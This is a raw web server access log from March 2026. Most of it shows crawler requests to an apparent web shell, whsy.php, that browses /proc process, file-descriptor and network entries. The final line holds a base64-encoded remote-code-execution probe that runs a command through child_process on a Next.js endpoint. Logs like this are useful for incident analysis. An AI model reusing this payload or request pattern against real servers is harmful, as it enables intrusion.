74.7.241.42 - - [02/Mar/2026:14:22:53 +0000] "GET /whsy.php?e=tcp&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 7344 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:23:33 +0000] "GET /whsy.php?e=arp&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2580 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:24:08 +0000] "GET /whsy.php?e=tcp&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 9882 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:24:53 +0000] "GET /whsy.php?e=rt_acct&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 2529 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:25:31 +0000] "GET /whsy.php?e=rt_acct&p=%2Fproc%2F26963%2Fnet HTTP/2.0" 200 2529 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:26:18 +0000] "GET /whsy.php?e=rt_acct&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 2530 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:14:26:19 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:14:26:59 +0000] "GET /whsy.php?e=route&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2638 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:27:44 +0000] "GET /whsy.php?e=exec&p=%2Fproc%2F29782%2Fattr HTTP/2.0" 200 859 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fattr" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:28:43 +0000] "GET /whsy.php?e=prev&p=%2Fproc%2F29566%2Fattr HTTP/2.0" 200 859 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fattr" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:29:34 +0000] "GET /whsy.php?e=prev&p=%2Fproc%2F26963%2Fattr HTTP/2.0" 200 859 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fattr" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:30:25 +0000] "GET /whsy.php?e=prev&p=%2Fproc%2F29775%2Fattr HTTP/2.0" 200 860 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fattr" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:31:16 +0000] "GET /whsy.php?e=pfkey&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2535 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:32:10 +0000] "GET /whsy.php?e=arp&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 2580 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:14:32:11 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:14:32:45 +0000] "GET /whsy.php?e=arp&p=%2Fproc%2F26963%2Fnet HTTP/2.0" 200 2579 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:33:45 +0000] "GET /whsy.php?e=arp&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 2581 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:34:31 +0000] "GET /whsy.php?e=raw&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2578 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:35:17 +0000] "GET /whsy.php?p=%2Fproc%2F26963%2Fnet%2Fipt_hashlimit HTTP/2.0" 200 500 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:36:01 +0000] "GET /whsy.php?p=%2Fproc%2F29566%2Fnet%2Fipt_hashlimit HTTP/2.0" 200 501 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:36:57 +0000] "GET /whsy.php?p=%2Fproc%2F29775%2Fnet%2Fipt_hashlimit HTTP/2.0" 200 501 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:37:33 +0000] "GET /whsy.php?e=ip_vs&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2615 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:14:37:34 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:14:38:11 +0000] "GET /whsy.php?p=%2Fproc%2F29782%2Fnet%2Fipt_hashlimit HTTP/2.0" 200 500 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:38:47 +0000] "GET /whsy.php?e=packet&p=%2Fproc%2F26963%2Fnet HTTP/2.0" 200 2571 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:39:42 +0000] "GET /whsy.php?e=packet&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 2572 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:40:25 +0000] "GET /whsy.php?e=packet&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 2572 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:41:09 +0000] "GET /whsy.php?p=%2Fproc%2F29782%2Ffdinfo HTTP/2.0" 200 199718 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:42:13 +0000] "GET /whsy.php?p=%2Fproc%2F26963%2Ffdinfo HTTP/2.0" 200 382124 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:14:42:43 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:14:43:16 +0000] "GET /whsy.php?p=%2Fproc%2F29775%2Ffdinfo HTTP/2.0" 200 306702 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:44:27 +0000] "GET /whsy.php?p=%2Fproc%2F20977%2Ffdinfo HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F20977" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:45:12 +0000] "GET /whsy.php?p=%2Fproc%2F29566%2Ffdinfo HTTP/2.0" 200 261466 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:46:27 +0000] "GET /whsy.php?e=netstat&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 4243 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:47:15 +0000] "GET /whsy.php?e=packet&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2572 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:48:03 +0000] "GET /whsy.php?e=netstat&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 4241 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:14:48:04 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:14:48:49 +0000] "GET /whsy.php?e=netstat&p=%2Fproc%2F26963%2Fnet HTTP/2.0" 200 4236 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:49:30 +0000] "GET /whsy.php?e=netlink&p=%2Fproc%2F26963%2Fnet HTTP/2.0" 200 2811 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:50:17 +0000] "GET /whsy.php?e=udplite&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2583 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
45.148.10.23 - - [02/Mar/2026:14:50:42 +0000] "GET / HTTP/1.1" 200 401 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36"
74.7.241.42 - - [02/Mar/2026:14:51:14 +0000] "GET /whsy.php?e=udplite&p=%2Fproc%2F26963%2Fnet HTTP/2.0" 200 2583 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:51:47 +0000] "GET /whsy.php?e=tls_stat&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 2601 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:52:28 +0000] "GET /whsy.php?e=tls_stat&p=%2Fproc%2F26963%2Fnet HTTP/2.0" 200 2601 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:53:18 +0000] "GET /whsy.php?e=netlink&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 2812 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:53:58 +0000] "GET /whsy.php?e=udplite&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 2583 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:54:45 +0000] "GET /whsy.php?e=netlink&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 2812 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:55:26 +0000] "GET /whsy.php?e=fib_trie&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2694 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:56:18 +0000] "GET /whsy.php?e=udplite&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 2583 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:57:15 +0000] "GET /whsy.php?e=tls_stat&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 2602 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:58:06 +0000] "GET /whsy.php?e=mcfilter&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2538 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:14:59:01 +0000] "GET /whsy.php?e=rt_acct&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2530 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:14:59:02 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:15:00:07 +0000] "GET /whsy.php?p=%2Fproc%2F23222%2Fmap_files HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F23222" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:00:59 +0000] "GET /whsy.php?p=%2Fproc%2F29782%2Fnet%2Fnetfilter HTTP/2.0" 200 732 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:01:59 +0000] "GET /whsy.php?p=%2Fproc%2F32189%2Ffd HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F32189" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:02:54 +0000] "GET /whsy.php?p=%2Fproc%2F29782%2Ffd HTTP/2.0" 200 497198 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:04:31 +0000] "GET /whsy.php?p=%2Fproc%2F26963%2Fns HTTP/2.0" 200 294132 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:15:05:01 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:15:06:04 +0000] "GET /whsy.php?p=%2Fproc%2F18443%2Ffd HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F18443" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:07:20 +0000] "GET /whsy.php?p=%2Fproc%2F29782%2Fns HTTP/2.0" 200 246023 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:09:01 +0000] "GET /whsy.php?p=%2Fproc%2F20977%2Ffd HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F20977" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:10:07 +0000] "GET /whsy.php?p=%2Fproc%2F29775%2Ffd HTTP/2.0" 200 213044 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:15:10:37 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:15:11:44 +0000] "GET /whsy.php?p=%2Fproc%2F29566%2Ffd HTTP/2.0" 200 288439 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:13:13 +0000] "GET /whsy.php?p=%2Fproc%2F20977%2Fns HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F20977" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:14:42 +0000] "GET /whsy.php?p=%2Fproc%2F18443%2Fns HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F18443" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:15:42 +0000] "GET /whsy.php?p=%2Fproc%2F29775%2Fns HTTP/2.0" 200 245428 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:15:16:12 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:15:17:26 +0000] "GET /whsy.php?p=%2Fproc%2F29566%2Fns HTTP/2.0" 200 192643 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:19:16 +0000] "GET /whsy.php?p=%2Fproc%2F32189%2Fns HTTP/2.0" 200 830 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F32189" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:20:28 +0000] "GET /whsy.php?p=%2Fproc%2F26963%2Ffd HTTP/2.0" 200 194259 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:22:04 +0000] "GET /whsy.php?e=ip_vs&p=%2Fproc%2F26963%2Fnet HTTP/2.0" 200 2615 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F26963%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.228.61 - - [02/Mar/2026:15:22:06 +0000] "GET /robots.txt HTTP/2.0" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36; compatible; OAI-SearchBot/1.3; robots.txt; +https://openai.com/searchbot"
74.7.241.42 - - [02/Mar/2026:15:23:26 +0000] "GET /whsy.php?e=ip_vs&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 2616 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:24:45 +0000] "GET /whsy.php?e=ip_vs&p=%2Fproc%2F29566%2Fnet HTTP/2.0" 200 2615 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29566%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:25:59 +0000] "GET /whsy.php?e=udplite6&p=%2Fproc%2F29782%2Fnet HTTP/2.0" 200 2586 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29782%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
74.7.241.42 - - [02/Mar/2026:15:27:00 +0000] "GET /whsy.php?e=if_inet6&p=%2Fproc%2F29775%2Fnet HTTP/2.0" 200 2570 "https://www.lordritzy.com.lab2454.com/whsy.php?p=%2Fproc%2F29775%2Fnet" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)"
45.148.10.120 - - [02/Mar/2026:15:27:17 +0000] "GET / HTTP/1.1" 200 37374 "-" "-"
45.148.10.120 - - [02/Mar/2026:15:27:23 +0000] "GET / HTTP/1.1" 200 37374 "-" "-"
45.148.10.120 - - [02/Mar/2026:15:27:28 +0000] "GET / HTTP/1.1" 200 37374 "-" "-"
45.148.10.120 - - [02/Mar/2026:15:27:29 +0000] "GET / HTTP/1.1" 200 37374 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
45.148.10.120 - - [02/Mar/2026:15:27:32 +0000] "GET /_next/data/buildId/page.json?cmd=CihmdW5jdGlvbigpewoJdHJ5IHsKCQl2YXIgY21kID0gImVjaG8gVlVMTl9URVNUIjsKCQl2YXIgcmVzdWx0ID0gcmVxdWlyZSgnY2hpbGRfcHJvY2VzcycpLmV4ZWNTeW5jKGNtZCwge2VuY29kaW5nOiAndXRmOCd9KTsKCQlyZXR1cm4gYnRvYShyZXN1bHQpOwoJfSBjYXRjaChlKSB7CgkJcmV0dXJuIGJ0b2EoZS50b1N0cmluZygpKTsKCX0KfSkoKQo= HTTP/1.1" 200 37676 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
